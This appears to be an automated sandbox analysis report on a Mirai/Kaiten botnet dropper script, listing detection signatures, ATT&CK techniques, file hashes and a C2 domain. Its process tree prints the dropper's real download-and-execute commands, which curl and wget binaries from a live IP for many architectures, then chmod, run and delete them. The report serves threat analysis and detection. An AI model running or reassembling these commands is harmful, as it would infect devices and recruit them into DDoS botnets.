kaiten | 7cc0addbe77dcd94ee4636584b53ef329c485313ff2566b7a0bfa7683c64543b

Analysis

max time kernel
141s
max time network
146s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
26/03/2025, 13:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bash.sh
Size

3KB
MD5

e9b0d773e0a26ba53952ccdc63e3ed85
SHA1

a2109f081a259a98f3534e67332f166d2f4307cb
SHA256

7cc0addbe77dcd94ee4636584b53ef329c485313ff2566b7a0bfa7683c64543b
SHA512

5c276f6197e53bf5be0592b91e75c0ce097df25c8efda26e698e58dfdb638644e13b30afa2f61d8683eba013bff0decc4eb8be070ee4d6ebfeb7e22185798696

Score

10^/10

kaiten mirai owari botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

OWARI

newageofkifirempire.camdvr.org

Extracted

Family

mirai

Botnet

OWARI

Extracted

Family

mirai

Botnet

OWARI

Extracted

Family

mirai

Botnet

OWARI

newageofkifirempire.camdvr.org

Extracted

Family

mirai

Botnet

OWARI

newageofkifirempire.camdvr.org

Extracted

Family

mirai

Botnet

OWARI

newageofkifirempire.camdvr.org

Signatures

Detects Kaiten/Tsunami Payload 10 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_kaiten2
behavioral3/files/fstream-2.dat	family_kaiten2
behavioral3/files/fstream-3.dat	family_kaiten2
behavioral3/files/fstream-4.dat	family_kaiten2
behavioral3/files/fstream-5.dat	family_kaiten2
behavioral3/files/fstream-6.dat	family_kaiten2
behavioral3/files/fstream-7.dat	family_kaiten2
behavioral3/files/fstream-8.dat	family_kaiten2
behavioral3/files/fstream-9.dat	family_kaiten2
behavioral3/files/fstream-11.dat	family_kaiten2

Detects Kaiten/Tsunami payload 10 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_kaiten
behavioral3/files/fstream-2.dat	family_kaiten
behavioral3/files/fstream-3.dat	family_kaiten
behavioral3/files/fstream-4.dat	family_kaiten
behavioral3/files/fstream-5.dat	family_kaiten
behavioral3/files/fstream-6.dat	family_kaiten
behavioral3/files/fstream-7.dat	family_kaiten
behavioral3/files/fstream-8.dat	family_kaiten
behavioral3/files/fstream-9.dat	family_kaiten
behavioral3/files/fstream-11.dat	family_kaiten

Kaiten family
kaiten
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 24 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
822	chmod
732	chmod
739	chmod
745	chmod
875	chmod
944	chmod
951	chmod
757	chmod
807	chmod
835	chmod
919	chmod
958	chmod
720	chmod
751	chmod
768	chmod
783	chmod
796	chmod
886	chmod
846	chmod
854	chmod
861	chmod
868	chmod
904	chmod
931	chmod

Executes dropped EXE 24 IoCs

ioc	pid	Process
/tmp/sshd	722	bash.sh
/tmp/openssh	733	bash.sh
/tmp/n	740	bash.sh
/tmp/tftp	746	bash.sh
/tmp/wget	752	bash.sh
/tmp/cron	758	bash.sh
/tmp/ftp	769	bash.sh
/tmp/pftp	785	bash.sh
/tmp/sh	797	bash.sh
/tmp/	809	bash.sh
/tmp/apache2	823	bash.sh
/tmp/telnetd	836	bash.sh
/tmp/GoldAge3ATOarm	848	bash.sh
/tmp/GoldAge3ATOarm6	855	bash.sh
/tmp/GoldAge3ATOarm5	862	bash.sh
/tmp/GoldAge3ATOarm7	869	bash.sh
/tmp/GoldAge3ATOm68k	876	bash.sh
/tmp/GoldAge3ATOmips	887	bash.sh
/tmp/GoldAge3ATOmpsl	905	bash.sh
/tmp/GoldAge3ATOppc	920	bash.sh
/tmp/GoldAge3ATOsh4	932	bash.sh
/tmp/GoldAge3ATOspc	945	bash.sh
/tmp/GoldAge3ATOx64	952	bash.sh
/tmp/GoldAge3ATOx86	959	bash.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	GoldAge3ATOmips
File opened for modification	/dev/misc/watchdog	GoldAge3ATOmips

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	GoldAge3ATOmips

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	hasbabsbahbbbbbaab	887	GoldAge3ATOmips

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	GoldAge3ATOmips

Reads runtime system information 55 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/890/fd	GoldAge3ATOmips
File opened for reading	/proc/458/exe	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/373/fd	GoldAge3ATOmips
File opened for reading	/proc/385/fd	GoldAge3ATOmips
File opened for reading	/proc/394/fd	GoldAge3ATOmips
File opened for reading	/proc/487/fd	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/695/exe	GoldAge3ATOmips
File opened for reading	/proc/164/fd	GoldAge3ATOmips
File opened for reading	/proc/313/fd	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/489/exe	GoldAge3ATOmips
File opened for reading	/proc/696/exe	GoldAge3ATOmips
File opened for reading	/proc/701/exe	GoldAge3ATOmips
File opened for reading	/proc/321/fd	GoldAge3ATOmips
File opened for reading	/proc/352/fd	GoldAge3ATOmips
File opened for reading	/proc/372/fd	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/694/exe	GoldAge3ATOmips
File opened for reading	/proc/316/fd	GoldAge3ATOmips
File opened for reading	/proc/489/fd	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/888/exe	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/452/exe	GoldAge3ATOmips
File opened for reading	/proc/487/exe	GoldAge3ATOmips
File opened for reading	/proc/225/fd	GoldAge3ATOmips
File opened for reading	/proc/892/fd	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/675/exe	GoldAge3ATOmips
File opened for reading	/proc/1/fd	GoldAge3ATOmips
File opened for reading	/proc/888/fd	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/892/exe	GoldAge3ATOmips
File opened for reading	/proc/314/fd	GoldAge3ATOmips
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/893/exe	GoldAge3ATOmips
File opened for reading	/proc/140/fd	GoldAge3ATOmips
File opened for reading	/proc/675/fd	GoldAge3ATOmips

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
881	curl
887	GoldAge3ATOmips
891	rm
895	rm
880	wget

Writes file to tmp directory 47 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/GoldAge3ATOmips	wget
File opened for modification	/tmp/n	curl
File opened for modification	/tmp/n.1	wget
File opened for modification	/tmp/pftp	curl
File opened for modification	/tmp/GoldAge3ATOarm5	wget
File opened for modification	/tmp/GoldAge3ATOmpsl	curl
File opened for modification	/tmp/tftp.1	wget
File opened for modification	/tmp/wget	curl
File opened for modification	/tmp/wget.1	wget
File opened for modification	/tmp/ftp	curl
File opened for modification	/tmp/GoldAge3ATOx86	wget
File opened for modification	/tmp/openssh	curl
File opened for modification	/tmp/pftp.1	wget
File opened for modification	/tmp/apache2	curl
File opened for modification	/tmp/GoldAge3ATOmpsl	wget
File opened for modification	/tmp/GoldAge3ATOx86	curl
File opened for modification	/tmp/openssh.1	wget
File opened for modification	/tmp/ftp.1	wget
File opened for modification	/tmp/	curl
File opened for modification	/tmp/telnetd	curl
File opened for modification	/tmp/GoldAge3ATOarm6	wget
File opened for modification	/tmp/GoldAge3ATOarm6	curl
File opened for modification	/tmp/GoldAge3ATOarm5	curl
File opened for modification	/tmp/GoldAge3ATOarm7	wget
File opened for modification	/tmp/sshd	curl
File opened for modification	/tmp/cron	curl
File opened for modification	/tmp/cron.1	wget
File opened for modification	/tmp/sh.1	wget
File opened for modification	/tmp/GoldAge3ATOarm	wget
File opened for modification	/tmp/GoldAge3ATOmips	curl
File opened for modification	/tmp/GoldAge3ATOppc	wget
File opened for modification	/tmp/GoldAge3ATOsh4	wget
File opened for modification	/tmp/sshd.1	wget
File opened for modification	/tmp/tftp	curl
File opened for modification	/tmp/sh	curl
File opened for modification	/tmp/GoldAge3ATOarm7	curl
File opened for modification	/tmp/GoldAge3ATOspc	curl
File opened for modification	/tmp/GoldAge3ATOx64	curl
File opened for modification	/tmp/ .1	wget
File opened for modification	/tmp/GoldAge3ATOm68k	wget
File opened for modification	/tmp/GoldAge3ATOppc	curl
File opened for modification	/tmp/GoldAge3ATOsh4	curl
File opened for modification	/tmp/GoldAge3ATOspc	wget
File opened for modification	/tmp/GoldAge3ATOx64	wget
File opened for modification	/tmp/apache2.1	wget
File opened for modification	/tmp/GoldAge3ATOarm	curl
File opened for modification	/tmp/GoldAge3ATOm68k	curl

/tmp/bash.sh
/tmp/bash.sh
1⤵
- Executes dropped EXE
PID:697
- /usr/bin/curl
  curl -O http://141.98.10.122/sshd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:700
- /usr/bin/wget
  wget http://141.98.10.122/sshd
  2⤵
  - Writes file to tmp directory
  PID:716
- /bin/chmod
  chmod +x sshd
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/sshd
  ./sshd
  2⤵
  PID:722
- /bin/rm
  rm -rf sshd
  2⤵
  PID:725
- /usr/bin/curl
  curl -O http://141.98.10.122/openssh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:726
- /usr/bin/wget
  wget http://141.98.10.122/openssh
  2⤵
  - Writes file to tmp directory
  PID:731
- /bin/chmod
  chmod +x openssh
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/openssh
  ./openssh
  2⤵
  PID:733
- /bin/rm
  rm -rf openssh
  2⤵
  PID:736
- /usr/bin/curl
  curl -O http://141.98.10.122/n
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:737
- /usr/bin/wget
  wget http://141.98.10.122/n
  2⤵
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod +x n
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/n
  ./n
  2⤵
  PID:740
- /bin/rm
  rm -rf n
  2⤵
  PID:742
- /usr/bin/curl
  curl -O http://141.98.10.122/tftp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:743
- /usr/bin/wget
  wget http://141.98.10.122/tftp
  2⤵
  - Writes file to tmp directory
  PID:744
- /bin/chmod
  chmod +x tftp
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/tftp
  ./tftp
  2⤵
  PID:746
- /bin/rm
  rm -rf tftp
  2⤵
  PID:748
- /usr/bin/curl
  curl -O http://141.98.10.122/wget
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /usr/bin/wget
  wget http://141.98.10.122/wget
  2⤵
  - Writes file to tmp directory
  PID:750
- /bin/chmod
  chmod +x wget
  2⤵
  - File and Directory Permissions Modification
  PID:751
- /tmp/wget
  ./wget
  2⤵
  PID:752
- /bin/rm
  rm -rf wget
  2⤵
  PID:754
- /usr/bin/curl
  curl -O http://141.98.10.122/cron
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /usr/bin/wget
  wget http://141.98.10.122/cron
  2⤵
  - Writes file to tmp directory
  PID:756
- /bin/chmod
  chmod +x cron
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/cron
  ./cron
  2⤵
  PID:758
- /bin/rm
  rm -rf cron
  2⤵
  PID:760
- /usr/bin/curl
  curl -O http://141.98.10.122/ftp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:761
- /usr/bin/wget
  wget http://141.98.10.122/ftp
  2⤵
  - Writes file to tmp directory
  PID:765
- /bin/chmod
  chmod +x ftp
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/ftp
  ./ftp
  2⤵
  PID:769
- /bin/rm
  rm -rf ftp
  2⤵
  PID:772
- /usr/bin/curl
  curl -O http://141.98.10.122/pftp
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:773
- /usr/bin/wget
  wget http://141.98.10.122/pftp
  2⤵
  - Writes file to tmp directory
  PID:778
- /bin/chmod
  chmod +x pftp
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/pftp
  ./pftp
  2⤵
  PID:785
- /bin/rm
  rm -rf pftp
  2⤵
  PID:787
- /usr/bin/curl
  curl -O http://141.98.10.122/sh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:788
- /usr/bin/wget
  wget http://141.98.10.122/sh
  2⤵
  - Writes file to tmp directory
  PID:792
- /bin/chmod
  chmod +x sh
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/sh
  ./sh
  2⤵
  PID:797
- /bin/rm
  rm -rf sh
  2⤵
  PID:799
- /usr/bin/curl
  curl -O "http://141.98.10.122/ "
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:801
- /usr/bin/wget
  wget "http://141.98.10.122/ "
  2⤵
  - Writes file to tmp directory
  PID:804
- /bin/chmod
  chmod +x " "
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/
  "./ "
  2⤵
  PID:809
- /bin/rm
  rm -rf " "
  2⤵
  PID:811
- /usr/bin/curl
  curl -O http://141.98.10.122/apache2
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:812
- /usr/bin/wget
  wget http://141.98.10.122/apache2
  2⤵
  - Writes file to tmp directory
  PID:817
- /bin/chmod
  chmod +x apache2
  2⤵
  - File and Directory Permissions Modification
  PID:822
- /tmp/apache2
  ./apache2
  2⤵
  PID:823
- /bin/rm
  rm -rf apache2
  2⤵
  PID:825
- /usr/bin/curl
  curl -O http://141.98.10.122/telnetd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:826
- /usr/bin/wget
  wget http://141.98.10.122/telnetd
  2⤵
  PID:832
- /bin/chmod
  chmod +x telnetd
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/telnetd
  ./telnetd
  2⤵
  PID:836
- /bin/rm
  rm -rf telnetd
  2⤵
  PID:838
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOarm
  2⤵
  - Writes file to tmp directory
  PID:840
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOarm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:844
- /bin/chmod
  chmod 777 GoldAge3ATOarm
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/GoldAge3ATOarm
  ./GoldAge3ATOarm arn
  2⤵
  PID:848
- /bin/rm
  rm -rf GoldAge3ATOarm
  2⤵
  PID:850
- /bin/rm
  rm -rf GoldAge3ATOarm.1
  2⤵
  PID:851
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOarm6
  2⤵
  - Writes file to tmp directory
  PID:852
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOarm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:853
- /bin/chmod
  chmod 777 GoldAge3ATOarm6
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/GoldAge3ATOarm6
  ./GoldAge3ATOarm6 arm6
  2⤵
  PID:855
- /bin/rm
  rm -rf GoldAge3ATOarm6
  2⤵
  PID:857
- /bin/rm
  rm -rf GoldAge3ATOarm6.1
  2⤵
  PID:858
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOarm5
  2⤵
  - Writes file to tmp directory
  PID:859
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOarm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:860
- /bin/chmod
  chmod 777 GoldAge3ATOarm5
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/GoldAge3ATOarm5
  ./GoldAge3ATOarm5 arn5
  2⤵
  PID:862
- /bin/rm
  rm -rf GoldAge3ATOarm5
  2⤵
  PID:864
- /bin/rm
  rm -rf GoldAge3ATOarm5.1
  2⤵
  PID:865
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOarm7
  2⤵
  - Writes file to tmp directory
  PID:866
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOarm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:867
- /bin/chmod
  chmod 777 GoldAge3ATOarm7
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /tmp/GoldAge3ATOarm7
  ./GoldAge3ATOarm7 arm7
  2⤵
  PID:869
- /bin/rm
  rm -rf GoldAge3ATOarm7
  2⤵
  PID:871
- /bin/rm
  rm -rf GoldAge3ATOarm7.1
  2⤵
  PID:872
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOm68k
  2⤵
  - Writes file to tmp directory
  PID:873
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOm68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:874
- /bin/chmod
  chmod 777 GoldAge3ATOm68k
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/GoldAge3ATOm68k
  ./GoldAge3ATOm68k m68k
  2⤵
  PID:876
- /bin/rm
  rm -rf GoldAge3ATOm68k
  2⤵
  PID:878
- /bin/rm
  rm -rf GoldAge3ATOm68k.1
  2⤵
  PID:879
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOmips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:880
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOmips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:881
- /bin/chmod
  chmod 777 GoldAge3ATOmips
  2⤵
  - File and Directory Permissions Modification
  PID:886
- /tmp/GoldAge3ATOmips
  ./GoldAge3ATOmips mips
  2⤵
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:887
- /bin/rm
  rm -rf GoldAge3ATOmips
  2⤵
  - System Network Configuration Discovery
  PID:891
- /bin/rm
  rm -rf GoldAge3ATOmips.1
  2⤵
  - System Network Configuration Discovery
  PID:895
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOmpsl
  2⤵
  - Writes file to tmp directory
  PID:896
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOmpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:900
- /bin/chmod
  chmod 777 GoldAge3ATOmpsl
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/GoldAge3ATOmpsl
  ./GoldAge3ATOmpsl mpsl
  2⤵
  PID:905
- /bin/rm
  rm -rf GoldAge3ATOmpsl
  2⤵
  PID:908
- /bin/rm
  rm -rf GoldAge3ATOmpsl.1
  2⤵
  PID:909
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOppc
  2⤵
  - Writes file to tmp directory
  PID:910
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:914
- /bin/chmod
  chmod 777 GoldAge3ATOppc
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/GoldAge3ATOppc
  ./GoldAge3ATOppc ppc
  2⤵
  PID:920
- /bin/rm
  rm -rf GoldAge3ATOppc
  2⤵
  PID:923
- /bin/rm
  rm -rf GoldAge3ATOppc.1
  2⤵
  PID:924
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOsh4
  2⤵
  - Writes file to tmp directory
  PID:925
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOsh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:928
- /bin/chmod
  chmod 777 GoldAge3ATOsh4
  2⤵
  - File and Directory Permissions Modification
  PID:931
- /tmp/GoldAge3ATOsh4
  ./GoldAge3ATOsh4 sh4
  2⤵
  PID:932
- /bin/rm
  rm -rf GoldAge3ATOsh4
  2⤵
  PID:935
- /bin/rm
  rm -rf GoldAge3ATOsh4.1
  2⤵
  PID:936
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOspc
  2⤵
  - Writes file to tmp directory
  PID:938
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOspc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:940
- /bin/chmod
  chmod 777 GoldAge3ATOspc
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/GoldAge3ATOspc
  ./GoldAge3ATOspc spc
  2⤵
  PID:945
- /bin/rm
  rm -rf GoldAge3ATOspc
  2⤵
  PID:947
- /bin/rm
  rm -rf GoldAge3ATOspc.1
  2⤵
  PID:948
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOx64
  2⤵
  - Writes file to tmp directory
  PID:949
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOx64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:950
- /bin/chmod
  chmod 777 GoldAge3ATOx64
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/GoldAge3ATOx64
  ./GoldAge3ATOx64 x64
  2⤵
  PID:952
- /bin/rm
  rm -rf GoldAge3ATOx64
  2⤵
  PID:954
- /bin/rm
  rm -rf GoldAge3ATOx64.1
  2⤵
  PID:955
- /usr/bin/wget
  wget 141.98.10.122/GoldAge3ATOx86
  2⤵
  - Writes file to tmp directory
  PID:956
- /usr/bin/curl
  curl -O 141.98.10.122/GoldAge3ATOx86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:957
- /bin/chmod
  chmod 777 GoldAge3ATOx86
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/GoldAge3ATOx86
  ./GoldAge3ATOx86 x86
  2⤵
  PID:959
- /bin/rm
  rm -rf GoldAge3ATOx86
  2⤵
  PID:961
- /bin/rm
  rm -rf GoldAge3ATOx86.1
  2⤵
  PID:962

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/

Filesize
15B

MD5
6196dba52703776af2e6593f772ed7ce

SHA1
fd78bb053b4bd423260212d1fe5bd7bc7750efce

SHA256
19b843cc92cb12aa314bb3c3913b2feeb852e85969bf06cb9d096931bfda34ba

SHA512
4f43c449c45e5513e29f62611e6feb9cf8aac70fab566f73a5ccad1fff7d20de6a6920914a73b0952a151bf96c32a8a521ec34206eda9d27fabcaad16410ed06

Download Submit
/tmp/GoldAge3ATOarm

Filesize
42KB

MD5
b58316c521f8621ace5b4a883ae495a1

SHA1
71e2344a723a0066ae1fe80d26b63f71d85fe6d1

SHA256
f4aaffa4c2dd047542f38e60afa96554cff53c6083aefbeae49c2f2ccc183608

SHA512
c7181cd78fc97e0158d9ccf01c8bd7c65776eb344c3828cecd71eb92e8ef0ef84e50f018a8d154015baf3a3ec7b7404a5d9f5678d5a3b782ca190fb88a8afeae

Download Submit
/tmp/GoldAge3ATOarm5

Filesize
34KB

MD5
e47ad4d4cade3a8cafad3db4b22d83d1

SHA1
aa6642c9725f5028ba226e9d02a811d815367847

SHA256
80091a5d2912312e797e04bd5eb16290bde71f2f1eda338eb5d7d4788033ab9b

SHA512
52a0f28d9b8fbfe8c10434a68bdb982978ea8a6c4ece07619e5716b020ca66c9579370ed49f1906a84e0429acef259a83c4a2ad08b7e0ace1fbff1f198edbcc6

Download Submit
/tmp/GoldAge3ATOarm6

Filesize
53KB

MD5
4e25a773ef66310a0b4fe7129ba20de4

SHA1
d57058a515beb010a7e96c2ac3ba8fd2b0ebca99

SHA256
127a8f9ef876f72c390896631c14d7b406d127408917f9e395a2931d8a81b955

SHA512
df6aea653867d4bf77da88c37dd4b6160247e4e19dd104a94abd155859e47d3cbf6648dbfc1fe9e02eed6cd60496a7c67a3daaeb9f01d8ecb9073d63cc3726d8

Download Submit
/tmp/GoldAge3ATOarm7

Filesize
110KB

MD5
5097ceccb234605597f00ef93ede8751

SHA1
542de5358c6680a9b74f5e63d814b3b8593232b8

SHA256
2f8d5e01c5f945c7414bac1550b7d651fb3e791a68c1f0685037c5727663d66a

SHA512
65c172a3ee5162c9e7a72a5afa070bf89e91e9a8e1e740e3e7b55fe6b2ae81e07505d5bcf3c87e743622e36510a71af4797117e98fd5a7d69edddac999bffad6

Download Submit
/tmp/GoldAge3ATOm68k

Filesize
41KB

MD5
08c43f317206176398da4ce873c9b077

SHA1
acd7c6d4cf6961d335eb5560504f5b51a83468fc

SHA256
44b381bde81d6386a8713a1f5a89c4f5511dd5471048046b9deef96bed7ef779

SHA512
41d0723f553ebf931111d601630b4be1e91745e9a44c5763765d1df25602abb58fc5b584cec8f8177e98ccc9d0febd00193fd084e79bb4b8906c6f0fe8725b57

Download Submit
/tmp/GoldAge3ATOmips

Filesize
53KB

MD5
b25adc97864efce4fad6915113d432bb

SHA1
f83b6b19bc9080737efdcc36355065183b1f2873

SHA256
a587e7c7f11dbc533f4eca031049ac269da0356b97195612993d4fbad9b2d2a7

SHA512
1b7252f5b68b6547bb28de7551161698bb3f9caf7a218432f3abaeb28aafad9483eba08697cc23191da492118cba2182f80d250e1768dc2402012b742dabe840

Download Submit
/tmp/GoldAge3ATOmpsl

Filesize
55KB

MD5
c4b8705dc8ae7e51d0122b4afeb9bed5

SHA1
2c3aec92a0f61e67e1870436ed01544fd960dc52

SHA256
92154f4dfb53fcaaa598b1e8cdf408043694f4714f8ccce544d5ce6abfdd6724

SHA512
b27a9ba545f3fd5ac648fee463317987dd6eac754c76c667c876ada5c039616fa788e948e49e9d6c1f2b58f18a3bc8cb87daeeb00f40f8f6540ecb80e8a6f52a

Download Submit
/tmp/GoldAge3ATOppc

Filesize
39KB

MD5
d6127758c157cc32f612951c5ca51457

SHA1
bb78b97a08e5ae9bd9758f9bb292e148b539ba61

SHA256
790599cb608623c255987fa21bacdeed32b540e84a9c4f206b7ebcd3d5f076e9

SHA512
f31669ca46b566426355b152f64bd66b06b0c2e5ad26d55d4b98746c2bc6accf45e56f5eb454d7c50fea5d580325300298a18149ad37f7def9b44c66e7db2815

Download Submit
/tmp/GoldAge3ATOsh4

Filesize
36KB

MD5
89efd2e14dc8613ffda292cf3d390ceb

SHA1
78c7e51fb2bee42e6a927ea9879393e35000c4c9

SHA256
b1d71bff5722d0a1a0e231ccd55baae4a74ef9dc6e7e17d0d73dbe270d9e7378

SHA512
babb272c58305f19ec0ee6779b40d343cb50ef50959e47e26aba4fcbd9f53839e0a379040f67fc481a144f79e9d704de09b8e9cbbf5a2b2842e897e37dc2e1fd

Download Submit
/tmp/GoldAge3ATOspc

Filesize
44KB

MD5
e19a9d8e5622b1fa1736dc49cf00be55

SHA1
7c8768a86172280ee05e65617ddca3809e2a41c0

SHA256
2e94d64031cbc545e1c446f7d89ab70072b2781e47f98b1c193456a56f935bef

SHA512
9d4a941b53525b783419a570906e49d964d0fcb6affdf41f0e23aaa8e5a2abbb2645ba1f4feac64d09c67a7c6cf681ad1151382efde5be154501ac2b99349b5d

Download Submit
/tmp/GoldAge3ATOx64

Filesize
41KB

MD5
b70cf616255d6fba57636332d273b317

SHA1
514ac1e551e002786d0141ae9d4268b544f8a2ad

SHA256
3267485f753ca20ad6384328b42444aaaaad5746776b38b8b2d707f5f0439931

SHA512
4297c7c0149f9bd1ef816a9735de167afa7c3d48d09954abcfdca3395e4c8852688b4b3e34fdc6996d69e2075e74a290a71ecee973bbe3ad6ade141b0df7ca6a

Download Submit
/tmp/GoldAge3ATOx86

